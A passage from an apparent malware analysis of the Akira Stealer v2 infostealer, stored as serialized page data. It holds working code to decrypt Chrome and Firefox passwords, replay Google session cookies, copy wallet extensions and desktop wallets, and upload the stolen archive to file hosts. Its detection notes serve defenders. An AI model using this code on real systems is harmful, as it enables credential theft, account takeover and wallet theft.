tag)\n",[1524,13124,13125,13130,13135,13140,13145],{"__ignoreMap":863},[1588,13126,13127],{"class":1590,"line":1591},[1588,13128,13129],{},"nonce = value[3:15]\n",[1588,13131,13132],{"class":1590,"line":864},[1588,13133,13134],{},"ciphertext = value[15:-16]\n",[1588,13136,13137],{"class":1590,"line":1814},[1588,13138,13139],{},"tag = value[-16:]\n",[1588,13141,13142],{"class":1590,"line":1831},[1588,13143,13144],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[1588,13146,13147],{"class":1590,"line":2135},[1588,13148,13149],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[806,13151,13152,13153,2786],{},"If fallback to DPAPI is needed (on older systems), it uses ",[1524,13154,13155],{},"win32crypt.CryptUnprotectData()",[806,13157,13158,13164],{},[1736,13159,13160,13161,3034],{},"Explanation of ",[1524,13162,13163],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[4351,13166,13167,13177],{},[2741,13168,13169,13172,13173,13176],{},[1736,13170,13171],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[1524,13174,13175],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[2741,13178,13179,13182,13183,13186],{},[1736,13180,13181],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[1524,13184,13185],{},"cryptography"," library to decrypt the payload securely.",[1545,13188,13190],{"className":10501,"code":13189,"language":10503,"meta":863,"style":863},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob 
from the `password_value` field\n    - key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[1524,13191,13192,13197,13202,13206,13210,13215,13219,13224,13228,13233,13238,13243,13247,13252,13257,13261,13266,13271,13276,13281,13285,13290,13295,13300,13305,13310,13315,13320,13325,13330,13334,13339,13344,13349,13354,13359,13363,13368,13372,13377,13382,13386,13391],{"__ignoreMap":863},[1588,13193,13194],{"class":1590,"line":1591},[1588,13195,13196],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[1588,13198,13199],{"class":1590,"line":864},[1588,13200,13201],{},"from cryptography.hazmat.backends import default_backend\n",[1588,13203,13204],{"class":1590,"line":1814},[1588,13205,9865],{"emptyLinePlaceholder":508},[1588,13207,13208],{"class":1590,"line":1831},[1588,13209,9865],{"emptyLinePlaceholder":508},[1588,13211,13212],{"class":1590,"line":2135},[1588,13213,13214],{},"def 
decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[1588,13216,13217],{"class":1590,"line":2141},[1588,13218,11844],{},[1588,13220,13221],{"class":1590,"line":2147},[1588,13222,13223],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[1588,13225,13226],{"class":1590,"line":2153},[1588,13227,9865],{"emptyLinePlaceholder":508},[1588,13229,13230],{"class":1590,"line":2159},[1588,13231,13232],{},"    Parameters:\n",[1588,13234,13235],{"class":1590,"line":2165},[1588,13236,13237],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[1588,13239,13240],{"class":1590,"line":11039},[1588,13241,13242],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[1588,13244,13245],{"class":1590,"line":11045},[1588,13246,9865],{"emptyLinePlaceholder":508},[1588,13248,13249],{"class":1590,"line":11051},[1588,13250,13251],{},"    Returns:\n",[1588,13253,13254],{"class":1590,"line":11057},[1588,13255,13256],{},"    - Decrypted UTF-8 plaintext password\n",[1588,13258,13259],{"class":1590,"line":11063},[1588,13260,11844],{},[1588,13262,13263],{"class":1590,"line":11069},[1588,13264,13265],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[1588,13267,13268],{"class":1590,"line":11075},[1588,13269,13270],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[1588,13272,13273],{"class":1590,"line":11081},[1588,13274,13275],{},"        # Uses Windows CryptUnprotectData under the hood\n",[1588,13277,13278],{"class":1590,"line":11087},[1588,13279,13280],{},"        return CryptUnprotectData(buffer)\n",[1588,13282,13283],{"class":1590,"line":11093},[1588,13284,9865],{"emptyLinePlaceholder":508},[1588,13286,13287],{"class":1590,"line":11099},[1588,13288,13289],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[1588,13291,13292],{"class":1590,"line":11105},[1588,13293,13294],{},"    # Bytes layout:\n",[1588,13296,13297],{"class":1590,"line":11111},[1588,13298,13299],{},"    # [0:3]    = version header 
('v10'/'v11')\n",[1588,13301,13302],{"class":1590,"line":11117},[1588,13303,13304],{},"    # [3:15]   = initialization vector (IV)\n",[1588,13306,13307],{"class":1590,"line":11123},[1588,13308,13309],{},"    # [15:-16] = ciphertext payload\n",[1588,13311,13312],{"class":1590,"line":11790},[1588,13313,13314],{},"    # [-16:]   = GCM authentication tag\n",[1588,13316,13317],{"class":1590,"line":11795},[1588,13318,13319],{},"    iv = buffer[3:15]\n",[1588,13321,13322],{"class":1590,"line":11800},[1588,13323,13324],{},"    ciphertext = buffer[15:-16]\n",[1588,13326,13327],{"class":1590,"line":11805},[1588,13328,13329],{},"    tag = buffer[-16:]\n",[1588,13331,13332],{"class":1590,"line":11811},[1588,13333,9865],{"emptyLinePlaceholder":508},[1588,13335,13336],{"class":1590,"line":11816},[1588,13337,13338],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[1588,13340,13341],{"class":1590,"line":11821},[1588,13342,13343],{},"    cipher = Cipher(\n",[1588,13345,13346],{"class":1590,"line":11826},[1588,13347,13348],{},"        algorithms.AES(key),\n",[1588,13350,13351],{"class":1590,"line":11831},[1588,13352,13353],{},"        modes.GCM(iv, tag),\n",[1588,13355,13356],{"class":1590,"line":11836},[1588,13357,13358],{},"        backend=default_backend()\n",[1588,13360,13361],{"class":1590,"line":11841},[1588,13362,11970],{},[1588,13364,13365],{"class":1590,"line":11847},[1588,13366,13367],{},"    decryptor = cipher.decryptor()\n",[1588,13369,13370],{"class":1590,"line":11853},[1588,13371,9865],{"emptyLinePlaceholder":508},[1588,13373,13374],{"class":1590,"line":11859},[1588,13375,13376],{},"    # Perform decryption; raises if authentication fails\n",[1588,13378,13379],{"class":1590,"line":11864},[1588,13380,13381],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[1588,13383,13384],{"class":1590,"line":11869},[1588,13385,9865],{"emptyLinePlaceholder":508},[1588,13387,13388],{"class":1590,"line":11874},[1588,13389,13390],{},"    # Decode 
to UTF-8, ignoring any stray errors\n",[1588,13392,13393],{"class":1590,"line":11879},[1588,13394,13395],{},"    return plaintext.decode('utf-8', errors='ignore')\n",[810,13397,13399],{"id":13398},"_76-session-token-hijacking","7.6 Session Token Hijacking",[806,13401,1536],{},[806,13403,13404,13405,13408],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After decrypting the relevant cookies and tokens from browser storage, it derives the required authorization header—as the snippet shows, a SAPISIDHASH value built from a SHA-1 over the timestamp, the origin and the victim’s SAPISID cookie—and replays a ",[1736,13406,13407],{},"MultiLogin"," request against Google’s accounts endpoint. The code snippet below illustrates this process:",[1545,13410,13412],{"className":10501,"code":13411,"language":10503,"meta":863,"style":863},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[1524,13413,13414,13419,13424,13429,13434,13439,13444,13449,13454,13459,13463,13468,13473,13478,13483,13488,13492,13497,13502],{"__ignoreMap":863},[1588,13415,13416],{"class":1590,"line":1591},[1588,13417,13418],{},"# Build SAPISIDHASH header for Google services\n",[1588,13420,13421],{"class":1590,"line":864},[1588,13422,13423],{},"origin = \"https://accounts.google.com\"\n",[1588,13425,13426],{"class":1590,"line":1814},[1588,13427,13428],{},"timestamp = 
int(time.time())\n",[1588,13430,13431],{"class":1590,"line":1831},[1588,13432,13433],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[1588,13435,13436],{"class":1590,"line":2135},[1588,13437,13438],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[1588,13440,13441],{"class":1590,"line":2141},[1588,13442,13443],{},"signature = hashlib.sha1(payload).hexdigest()\n",[1588,13445,13446],{"class":1590,"line":2147},[1588,13447,13448],{},"headers = {\n",[1588,13450,13451],{"class":1590,"line":2153},[1588,13452,13453],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[1588,13455,13456],{"class":1590,"line":2159},[1588,13457,13458],{},"    \"Content-Type\": \"application/json\"\n",[1588,13460,13461],{"class":1590,"line":2165},[1588,13462,8430],{},[1588,13464,13465],{"class":1590,"line":11039},[1588,13466,13467],{},"# Replay MultiLogin to fetch valid session cookies\n",[1588,13469,13470],{"class":1590,"line":11045},[1588,13471,13472],{},"response = requests.post(\n",[1588,13474,13475],{"class":1590,"line":11051},[1588,13476,13477],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[1588,13479,13480],{"class":1590,"line":11057},[1588,13481,13482],{},"    headers=headers,\n",[1588,13484,13485],{"class":1590,"line":11063},[1588,13486,13487],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[1588,13489,13490],{"class":1590,"line":11069},[1588,13491,11258],{},[1588,13493,13494],{"class":1590,"line":11075},[1588,13495,13496],{},"if response.status_code == 200:\n",[1588,13498,13499],{"class":1590,"line":11081},[1588,13500,13501],{},"    # Victim’s cookies now present in response.cookies\n",[1588,13503,13504],{"class":1590,"line":11087},[1588,13505,13506],{},"    hijacked_cookies = response.cookies\n",[806,13508,13509],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. 
This technique leverages Google’s own token acceptance logic, so at the protocol level it is nearly indistinguishable from legitimate client behavior. For responders this means an account whose SAPISID cookie was exposed should be treated as fully compromised: invalidate its active sessions rather than relying on a password change alone.",[810,13511,13513],{"id":13512},"_77-firefox-decryption","7.7 Firefox Decryption",[806,13515,1536],{},[806,13517,13518,13519,13522],{},"Gecko‑based browsers like Firefox encrypt saved logins (but not cookies or history, which are plain SQLite) with a master key stored in ",[1524,13520,13521],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master (primary) password prompt. Note that the key derivation still takes master_password as input: with no primary password set—the Firefox default—an empty string suffices and everything decrypts offline, whereas a configured primary password has to be supplied or brute-forced before the routine yields anything. Example usage:",[1545,13524,13526],{"className":10501,"code":13525,"language":10503,"meta":863,"style":863},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[1524,13527,13528,13533,13538,13543,13548,13553,13557,13562,13567,13572,13577,13582,13587,13592,13597,13602,13607,13611],{"__ignoreMap":863},[1588,13529,13530],{"class":1590,"line":1591},[1588,13531,13532],{},"# Load global Salt and encrypted item from key4.db\n",[1588,13534,13535],{"class":1590,"line":864},[1588,13536,13537],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[1588,13539,13540],{"class":1590,"line":1814},[1588,13541,13542],{},"cursor = db.cursor()\n",[1588,13544,13545],{"class":1590,"line":1831},[1588,13546,13547],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 
'password'\")\n",[1588,13549,13550],{"class":1590,"line":2135},[1588,13551,13552],{},"global_salt, item2 = cursor.fetchone()\n",[1588,13554,13555],{"class":1590,"line":2141},[1588,13556,9865],{"emptyLinePlaceholder":508},[1588,13558,13559],{"class":1590,"line":2147},[1588,13560,13561],{},"# Decode DER structure and derive key\n",[1588,13563,13564],{"class":1590,"line":2153},[1588,13565,13566],{},"decoded, _ = der_decode(item2)\n",[1588,13568,13569],{"class":1590,"line":2159},[1588,13570,13571],{},"entry_salt = decoded[0][1][0].asOctets()\n",[1588,13573,13574],{"class":1590,"line":2165},[1588,13575,13576],{},"cipher_text = decoded[1].asOctets()\n",[1588,13578,13579],{"class":1590,"line":11039},[1588,13580,13581],{},"# Derive 3DES key\n",[1588,13583,13584],{"class":1590,"line":11045},[1588,13585,13586],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[1588,13588,13589],{"class":1590,"line":11051},[1588,13590,13591],{},"iv = decoded[0][1][1].asOctets()\n",[1588,13593,13594],{"class":1590,"line":11057},[1588,13595,13596],{},"# Decrypt credentials\n",[1588,13598,13599],{"class":1590,"line":11063},[1588,13600,13601],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[1588,13603,13604],{"class":1590,"line":11069},[1588,13605,13606],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[1588,13608,13609],{"class":1590,"line":11075},[1588,13610,9865],{"emptyLinePlaceholder":508},[1588,13612,13613],{"class":1590,"line":11081},[1588,13614,13615],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[806,13617,13618,13619,2289,13621,8210,13623,13625],{},"With this routine, Akira can transparently dump ",[1524,13620,13017],{},[1524,13622,13020],{},[1524,13624,13023],{}," for each Firefox profile, writing the decrypted output to:",[1545,13627,13630],{"className":13628,"code":13629,"language":916},[1548],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> 
History.txt\n",[1524,13631,13629],{"__ignoreMap":863},[806,13633,13634],{},"This approach sidesteps the interactive primary-password prompt: when no primary password is set (the Firefox default) it gives the stealer every stored credential, and when one is set the routine only yields ciphertext for offline cracking.",[806,13636,13637],{},[1736,13638,13639],{},"4. File Structure & Naming",[1545,13641,13644],{"className":13642,"code":13643,"language":916,"meta":863},[1548],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[1524,13645,13643],{"__ignoreMap":863},[2738,13647,13648,13662,13668],{},[2741,13649,13650,13651,13654,13655,13658,13659,8072],{},"Each ",[1524,13652,13653],{},".txt"," begins with the same fixed header, a convenient detection string for the dropped files (",[1524,13656,13657],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[1524,13660,13661],{},"====…====",[2741,13663,13664,13665,2786],{},"On‑disk ZIP: ",[1524,13666,13667],{},"%TEMP%\\\u003CComputerName>.zip",[2741,13669,13670,13671,2786],{},"C&C filename label: ",[1524,13672,13673],{},"Akira-\u003Cusername>.zip",[806,13675,13676],{},[1736,13677,13678],{},"5. 
Exfiltration & Cleanup",[1545,13680,13682],{"className":10501,"code":13681,"language":10503,"meta":863,"style":863},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[1524,13683,13684,13689,13694,13699,13704],{"__ignoreMap":863},[1588,13685,13686],{"class":1590,"line":1591},[1588,13687,13688],{},"url = Webhook.uploadToGofile(zip_path)\n",[1588,13690,13691],{"class":1590,"line":864},[1588,13692,13693],{},"if not url:\n",[1588,13695,13696],{"class":1590,"line":1814},[1588,13697,13698],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1588,13700,13701],{"class":1590,"line":1831},[1588,13702,13703],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[1588,13705,13706],{"class":1590,"line":2135},[1588,13707,13708],{},"Utils.clear_client_folder()\n",[2738,13710,13711,13721,13735,13752],{},[2741,13712,13713,13716,13717,13720],{},[1736,13714,13715],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[1524,13718,13719],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[2741,13722,13723,13726,13727,13730,13731,13734],{},[1736,13724,13725],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[1524,13728,13729],{},"file.io",", and if that too returns an empty link, finally to ",[1524,13732,13733],{},"oshi.at",". 
Both alternatives are invoked without raising exceptions, so the three services are tried in turn until one returns a link. For defenders, outbound connections from an endpoint to these three file hosts are themselves a useful detection signal.",[2741,13736,13737,13740,13741,13744,13745,2289,13748,13751],{},[1736,13738,13739],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[1524,13742,13743],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[1524,13746,13747],{},"chatId",[1524,13749,13750],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[2741,13753,13754,13757,13758,13761],{},[1736,13755,13756],{},"Immediate Cleanup:"," After reporting, ",[1524,13759,13760],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, removing the harvested data and the archive from the file system. Unless that helper does more than an ordinary delete, this is not a secure wipe: the content may still be recoverable from unallocated space, and the network artifacts—the uploads to the file hosts and the webhook POST—are untouched by the cleanup.",[3587,13763,13764,13769],{},[806,13765,13766],{},[1736,13767,13768],{},"Failure Resilience:",[2738,13770,13771,13778],{},[2741,13772,13773,13774,13777],{},"All upload routines return ",[1524,13775,13776],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[2741,13779,13780],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[1541,13782],{"className":13783},[6875,6876],[806,13785,13786],{},[1736,13787,13788],{},"6. Robustness & Error Handling",[2738,13790,13791,13809,13815,13824],{},[2741,13792,13793,13796,13797,13800,13801,13804,13805,13808],{},[1736,13794,13795],{},"Granular Exception Handling:"," Every file system interaction—be it ",[1524,13798,13799],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[1524,13802,13803],{},"try/except"," blocks. 
When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[1524,13806,13807],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module. Because that logger appears to report over Telegram (the Tg suffix), each handled error also produces an outbound request that network monitoring can pick up.",[2741,13810,13811,13814],{},[1736,13812,13813],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[2741,13816,13817,13820,13821,13823],{},[1736,13818,13819],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[1524,13822,13803],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[2741,13825,13826,13829,13830,13833,13834,13837],{},[1736,13827,13828],{},"Mutex & Startup Guards:"," A named mutex (",[1524,13831,13832],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[1524,13835,13836],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment. The fixed mutex name doubles as a host-based indicator, and—assuming the guard exits when the mutex already exists—pre-creating it is a cheap way to vaccinate a host against this build.",[810,13839,13841],{"id":13840},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[806,13843,1536],{},[806,13845,13846],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. 
Below is a step-by-step, code-backed deep dive.",[1671,13848,13850],{"id":13849},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[806,13852,1677],{},[806,13854,13855,13858],{},[1736,13856,13857],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[1545,13860,13862],{"className":10501,"code":13861,"language":10503,"meta":863,"style":863},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... 
plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[1524,13863,13864,13869,13874,13879,13884,13889,13894,13899,13904,13909,13914,13919,13924,13929,13934,13939,13944,13949,13954,13959,13964,13969,13974],{"__ignoreMap":863},[1588,13865,13866],{"class":1590,"line":1591},[1588,13867,13868],{},"# Hardcoded list of extension IDs and human-friendly names\n",[1588,13870,13871],{"class":1590,"line":864},[1588,13872,13873],{},"walletsExtensions = [\n",[1588,13875,13876],{"class":1590,"line":1814},[1588,13877,13878],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[1588,13880,13881],{"class":1590,"line":1831},[1588,13882,13883],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[1588,13885,13886],{"class":1590,"line":2135},[1588,13887,13888],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[1588,13890,13891],{"class":1590,"line":2141},[1588,13892,13893],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[1588,13895,13896],{"class":1590,"line":2147},[1588,13897,13898],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[1588,13900,13901],{"class":1590,"line":2153},[1588,13902,13903],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[1588,13905,13906],{"class":1590,"line":2159},[1588,13907,13908],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[1588,13910,13911],{"class":1590,"line":2165},[1588,13912,13913],{},"    [\"Nami\",            
\"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[1588,13915,13916],{"class":1590,"line":11039},[1588,13917,13918],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[1588,13920,13921],{"class":1590,"line":11045},[1588,13922,13923],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[1588,13925,13926],{"class":1590,"line":11051},[1588,13927,13928],{},"    # ... plus dozens more mapped in code\n",[1588,13930,13931],{"class":1590,"line":11057},[1588,13932,13933],{},"]\n",[1588,13935,13936],{"class":1590,"line":11063},[1588,13937,13938],{},"# Extraction loop for each browser profile\n",[1588,13940,13941],{"class":1590,"line":11069},[1588,13942,13943],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[1588,13945,13946],{"class":1590,"line":11075},[1588,13947,13948],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[1588,13950,13951],{"class":1590,"line":11081},[1588,13952,13953],{},"    for ext_name, ext_id in walletsExtensions:\n",[1588,13955,13956],{"class":1590,"line":11087},[1588,13957,13958],{},"        src = os.path.join(base, ext_id)\n",[1588,13960,13961],{"class":1590,"line":11093},[1588,13962,13963],{},"        if os.path.isdir(src):\n",[1588,13965,13966],{"class":1590,"line":11099},[1588,13967,13968],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[1588,13970,13971],{"class":1590,"line":11105},[1588,13972,13973],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[1588,13975,13976],{"class":1590,"line":11111},[1588,13977,13978],{},"            data.ext_wallets_count += 1\n",[2738,13980,13981,13987],{},[2741,13982,13983,13986],{},[1736,13984,13985],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[2741,13988,13989,2545,13992,2289,13995,9904],{},[1736,13990,13991],{},"Outcome 
folder",[1524,13993,13994],{},"Wallets/MetaMask_Chrome/",[1524,13996,13997],{},"Wallets/Phantom_Edge/",[1671,13999,14001],{"id":14000},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[806,14003,1677],{},[806,14005,14006,14008],{},[1736,14007,13857],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[1545,14010,14012],{"className":10501,"code":14011,"language":10503,"meta":863,"style":863},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[1524,14013,14014,14019,14024,14029,14034,14039,14044,14049,14053,14058,14063,14068,14073,14078],{"__ignoreMap":863},[1588,14015,14016],{"class":1590,"line":1591},[1588,14017,14018],{},"walletsDesktop = [\n",[1588,14020,14021],{"class":1590,"line":864},[1588,14022,14023],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[1588,14025,14026],{"class":1590,"line":1814},[1588,14027,14028],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", 